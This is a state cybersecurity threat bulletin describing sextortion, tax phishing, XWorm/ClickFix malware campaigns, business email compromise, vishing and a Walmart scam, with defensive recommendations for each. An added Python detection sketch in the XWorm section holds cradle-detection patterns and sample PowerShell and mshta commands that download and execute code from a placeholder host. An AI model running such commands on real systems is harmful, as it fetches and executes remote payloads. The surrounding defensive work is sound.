New Jersey Cybersecurity & Communications Integration Cell

By: NJCCIC

1. Sextortion Scams Are Back
Image Source: KrebsOnSecurity
The NJCCIC received incident reports indicating that a new version of the well-known sextortion email scam is currently circulating. This version now includes a photo of the recipient's home, likely found via online mapping applications. The targeted individual's home address could have been easily obtained from public records or from personal information exposed in data breaches. The fraudulent scheme claims that Pegasus spyware was installed on the target's device and secretly recorded webcam footage of the recipient engaging in intimate activities. The targeted individual is then threatened with the release of compromising or sexually explicit photos or videos to their contacts and social media platforms unless a Bitcoin payment ranging from $500 to $2,500 is made. The email states that the targeted individual has 24 hours to pay by scanning the included QR code. The cybercriminal also claims to have embedded a tracking pixel that reports when the email is opened, which starts the 24-hour countdown.
Recommendations
  • The NJCCIC recommends users educate themselves and others on this and similar scams to prevent future victimization.
  • There is no indication that these threats are credible; therefore, users are advised to refrain from sending funds and disregard these emails.
  • Avoid clicking links, responding to, or otherwise acting on unsolicited text messages or emails.
  • Users can search for and report the bitcoin addresses included in the scam email to the Bitcoin Abuse Database.
  • This scam can be reported to the Federal Trade Commission (FTC), the FBI's IC3, and the NJCCIC.

2. Tax-Related Phishing Scams Now Deliver Malware
Last week, the NJCCIC reported increased phishing attempts targeting NJ state employees by impersonating the IRS. Proofpoint analysts noted a rise in tax-themed phishing campaigns, particularly as tax deadlines approach in the US and the UK. Likewise, these campaigns were also observed targeting NJ state employees. These phishing attempts typically impersonate government or financial organizations connected to tax filing. In early January, Proofpoint identified hundreds of malicious domains linked to tax-related campaigns, many of which impersonated legitimate companies.
Email impersonating Intuit (left); credential phishing landing page (right). Image Source: Proofpoint
One campaign observed on January 16 impersonated Intuit but used a generic sender with a URL directing users to a fake authentication page to harvest credentials. This campaign delivered 40,000 emails and impacted over 2,000 organizations.
Malicious email impersonating tax software. Image Source: Proofpoint
While most tax-themed campaigns focus on credential phishing, some were also observed delivering malware. A separate campaign impersonating a tax software company distributed two malware payloads via a JavaScript file hosted on Microsoft Azure, leading to the deployment of Rhadamanthys malware and zgRAT. Additionally, various unrelated campaigns impersonating tax agencies and tax software have been observed attempting to deliver other malware payloads, including MetaStealer, XWorm, AsyncRAT, and VenomRAT.
Recommendations
  • Beware of communications claiming to be from the IRS. The IRS does not contact individuals by phone, email, or text message to solicit information or money. Instead, the IRS sends notices and bills through postal mail.
  • Facilitate user awareness training to include these types of phishing-based techniques.
  • Avoid clicking links, opening attachments, responding to, or acting on unsolicited text messages or emails.
  • Type official website URLs into browsers manually.
  • Ensure multi-factor authentication (MFA) is enabled for all online accounts.
  • Consider leveraging behavior-based detection tools rather than signature-based tools.
  • Technical details, TTPs, and indicators of compromise (IOCs) can be found in the Proofpoint blog post.
  • Report phishing emails and other malicious cyber activity to the FTC, the FBI's IC3, and the NJCCIC.

3. XWorm Malware Quickly Slithers in Multiple Campaigns
First discovered in 2022, XWorm is a remote access trojan (RAT) capable of evading detection and collecting sensitive information, including financial details, browsing history, saved passwords, and cryptocurrency wallet data. XWorm tracks keystrokes, captures webcam images, listens to audio input, scans network connections, and views open windows. It can also read and manipulate a computer's clipboard, potentially stealing cryptocurrency wallet credentials. Last year, XWorm was involved in many cyberattacks, including the abuse of Cloudflare tunnels and delivery via a Windows Script File, and the upward trend of these sophisticated RATs is already evident in 2025.
Last month, researchers discovered that threat actors targeted script kiddies with a trojanized version of the XWorm RAT builder. The weaponized builder propagated through GitHub, Telegram, and file-sharing platforms and infected over 18,000 devices globally, including in the United States. The malware secretly compromised computers to deploy a backdoor used for system reconnaissance, command execution, and data exfiltration, including browser credentials, Discord tokens, Telegram data, and system information. Threat actors exfiltrated over 1 GB of browser credentials from multiple computers. The malware's "kill switch" feature was identified by researchers and used to disrupt operations on infected computers.
In the past month, the NJCCIC’s email security solution identified an uptick in multiple campaigns attempting to deliver XWorm malware to New Jersey State employees to gain remote access, steal credentials, exfiltrate data, and deploy ransomware. The messages impersonate Booking.com or a customer of a hospitality organization with themes of last-minute bookings to address customer complaints, inquiries about upcoming travel plans, or issues related to past travel reservations. They display subject lines containing keywords such as reservation, booking cancellation, request for action, poor evaluation, hotel accommodation, and establishment difficulty.
The messages contain various types of URLs, such as email trackers, URL shorteners, and open redirects. Multiple redirects and filtering steps occur before the target arrives at one of the numerous landing pages, which use various layouts and scripting. The landing page URLs contain keywords such as book, booking, complaint, feedback, inquiry, reportguest, and stayissueguest. The threat actors use the ClickFix technique, displaying dialog boxes with fake error messages to manipulate targets into following instructions to "fix" the problem. Sometimes they add a veneer of authenticity with a fake CAPTCHA-themed ClickFix prompt that asks the target to "verify" themselves. In either case, the target's clicks copy, paste, or run malicious commands in the background; the payloads use PowerShell or MSHTA commands to download and execute XWorm malware.
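A detection sketch for the ClickFix execution path described above, written here as an added example and not NJCCIC's own tooling: it scores constructed Sysmon-style process-creation events for mshta/PowerShell download cradles launched from explorer.exe (the Run-dialog paste pattern, a heuristic assumption) or carrying one of the landing-page keywords the bulletin lists.

```python
import re
from urllib.parse import urlparse

# Landing-page URL keywords the bulletin lists for this Booking.com-themed campaign.
LANDING_KEYWORDS = ("stayissueguest", "reportguest", "booking", "complaint",
                    "feedback", "inquiry", "book")
# Living-off-the-land binaries the bulletin says the ClickFix payloads invoke.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe"}
# Fragments typical of a download-and-execute one-liner pasted into the Run box.
CRADLE_MARKERS = ("http", "iwr", "invoke-webrequest", "downloadstring", "iex",
                  "invoke-expression", "-w hidden", "windowstyle hidden", "-enc")
URL_RE = re.compile(r"https?://[^\s\"'<>|]+", re.IGNORECASE)

def landing_keywords(text):
    """Page-listed keywords found in the host or path of any URL in text."""
    hits = set()
    for url in URL_RE.findall(text):
        u = urlparse(url)
        hits.update(k for k in LANDING_KEYWORDS if k in (u.netloc + u.path).lower())
    return sorted(hits)

def analyze_event(ev):
    """Score one Sysmon EID 1-style dict: LOLBIN + cradle markers + (explorer.exe
    parent, a heuristic for the Win+R paste pattern, OR a campaign URL keyword)."""
    image = re.split(r"[\\/]", ev.get("Image", ""))[-1].lower()
    parent = re.split(r"[\\/]", ev.get("ParentImage", ""))[-1].lower()
    cmd = ev.get("CommandLine", "")
    if image not in LOLBINS:
        return {"suspicious": False, "reasons": []}
    markers = [m for m in CRADLE_MARKERS if m in cmd.lower()]
    kws = landing_keywords(cmd)
    reasons = (["cradle markers: " + ", ".join(markers)] if markers else []) \
        + (["parent is explorer.exe"] if parent == "explorer.exe" else []) \
        + (["landing keywords: " + ", ".join(kws)] if kws else [])
    suspicious = bool(markers) and (parent == "explorer.exe" or bool(kws))
    return {"suspicious": suspicious, "reasons": reasons}

# Constructed sample telemetry (not real events); hosts use the reserved .invalid TLD.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/stayissueguest/verify"},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/booking/complaint | iex"'},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
]

def flagged_indices(events):
    return [i for i, ev in enumerate(events) if analyze_event(ev)["suspicious"]]
```

The keyword list and the explorer.exe parent heuristic will produce false positives on legitimate hospitality workflows, so treat hits as triage leads to correlate with the email's URL chain rather than as standalone alerts.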
Recommendations
  • Refrain from responding to unsolicited communications, clicking links, or opening attachments from unknown senders.
  • Exercise caution with communications from known senders.
  • Confirm requests from senders via contact information obtained from verified and official sources.
  • Type official website URLs into browsers manually and only submit account credentials or sensitive information on official websites.
  • Use strong, unique passwords for all accounts and enable multi-factor authentication (MFA) where available, choosing authentication apps or hardware tokens over SMS text-based codes.
  • Reduce your digital footprint so threat actors cannot easily target you.
  • Keep systems up to date and apply patches after appropriate testing.
  • Report phishing emails and other malicious cyber activity to the FBI's IC3 and the NJCCIC.

4. Business Email Compromise Campaign Circulating
The NJCCIC received reports of a business email compromise (BEC) campaign sent from a compromised emergency management email account. The phishing email referenced a contract and directed the recipient to click a link to view a related document. This link led to a Linktree webpage displaying the city's logo that instructed the user to click yet another link. The final landing page, which was designed to steal user account credentials, has since been taken down.
In other business email compromise campaigns, threat actors intend to convince the recipient that they are a vendor and payment for goods or services is due. These emails often include a fictitious invoice and payment instructions for a fraudulent account. They may also be sent from compromised email accounts, making it difficult for recipients to question the email’s legitimacy.
Recommendations
  • Confirm the source and instructions of any monetary transaction received via email through a separate means of communication, such as a phone call. Replies to the email are not an effective verification method as they could be sent to the threat actor.
  • While an email may appear to come from a known and trusted account, that account may have been compromised. Verify all requests for the transfer of money.
  • Do not submit your credentials (username and password) to websites with URLs unassociated with an official organization or business.
  • If you act on a financial BEC scam, notify your supervisor and banking institution immediately to attempt to disrupt the transfer of funds.
  • Create a policy and procedure for identifying and reporting BEC emails, including periodic employee awareness training.
  • Establish policies and procedures that require any requests for highly sensitive information or large financial transactions to be authorized and approved by multiple individuals via a secondary means of communication beyond email.
  • Review the Don’t Be Fooled: Ways to Prevent BEC Victimization NJCCIC Informational Report for additional information.

5. Uptick in Vishing Scams
The NJCCIC observed an uptick in vishing scams, a form of phishing over the phone. In these calls, threat actors attempt to gain trust and legitimacy by sharing some of the recipient’s personal data, such as name, age, and address. However, this data is typically an aggregated set of publicly available information found online. Some of this information may be outdated or pertain to a partner instead of the call recipient. The phone numbers used in vishing scams vary and change frequently, and threat actors often spoof official phone numbers to appear legitimate. Vishing calls may be persistent, and threat actors may contact potential victims multiple times daily.
Threat actors claim authority or legitimacy by impersonating various governmental agencies, financial institutions, organizations, and individuals to convince the call recipient to provide additional sensitive information, such as personally identifiable information (PII), financial information, or account credentials. They also convey urgency to extort money by persuading the call recipient to purchase fraudulent goods or services or grant access to their accounts or devices. The acquisition of additional information and this fraudulent activity can facilitate further cyberattacks.
In some instances, threat actors personally harass or threaten the call recipient or their known contacts. For example, a threat actor claimed the call recipient was responsible for a supposed accident and threatened them if they did not pay a hospital bill. In another example, the call recipient heard a woman crying in the background while a Spanish-speaking male claimed to be part of a cartel and demanded a $20,000 payment from the call recipient to keep the woman alive.
Additionally, a threat actor spoofed the phone number of the call recipient’s mother and demanded payment upon answering. If the call recipient did not make payment, the threat actor claimed they would kill the person they were supposedly holding at gunpoint. The call recipient heard crying in the background, disconnected the call, and contacted their mother on another line, confirming it was a scam. The call recipient’s sister also received a similar call spoofing their mother.
Furthermore, voice cloning technologies and artificial intelligence (AI) manipulations can be used in impersonation and extortion scams. Threat actors find and capture snippets of a person's voice online, through social media platforms, in outgoing voicemail messages, or when the targeted person answers a call. They can then use AI tools with the captured audio to clone the person's voice and stage fraudulent scenarios, including family emergencies, kidnappings, robberies, or car accidents.
Recommendations
  • Refrain from answering unexpected calls from unknown contacts.
  • When receiving unsolicited phone calls, do not respond to any requests for sensitive information, access, or money.
  • If suspicious inquiries are made by individuals claiming to represent a trustworthy organization, hang up and call the organization back using the official phone number found on their website.
  • Establish a password with important contacts, such as loved ones, employers, and coworkers, and request it if suspicious inquiries are made by individuals claiming to represent them.
  • Report vishing scams and other malicious cyber activity to the FBI's IC3 and the NJCCIC.
  • If you or someone you know is being physically threatened, contact your local police department or dial 9-1-1 immediately.

6. Walmart Scam Claims Purchase of PlayStation 5
A Walmart scam is circulating in which people receive voicemails claiming that a PlayStation 5 and headset purchase was made for $919.45. The scammers are attempting to lure the recipients into calling the phone number back to dispute the charge; at this point, the scammer will request personal and financial information. They may also request remote access to the recipient’s device, claiming they need the access to cancel the order or process a refund. If given access, the scammer can install malware, steal data, or use the access to extort the victim into paying a ransom demand. In some schemes, the scammer will instruct the individual to purchase gift cards as part of the refund process. LifeLock provides information on this and other Walmart scams in the article “13 Walmart Scams to Watch Out for In 2025.”
Recommendations
  • Ignore such voicemails, do not call the phone number back, and delete the voicemail message.
  • Log into your bank or credit card account directly to determine if unauthorized purchases have been made.
  • Never provide remote access to your device to an unverified individual.
  • Do not purchase gift cards as payment and never provide someone the codes on the back of a gift card.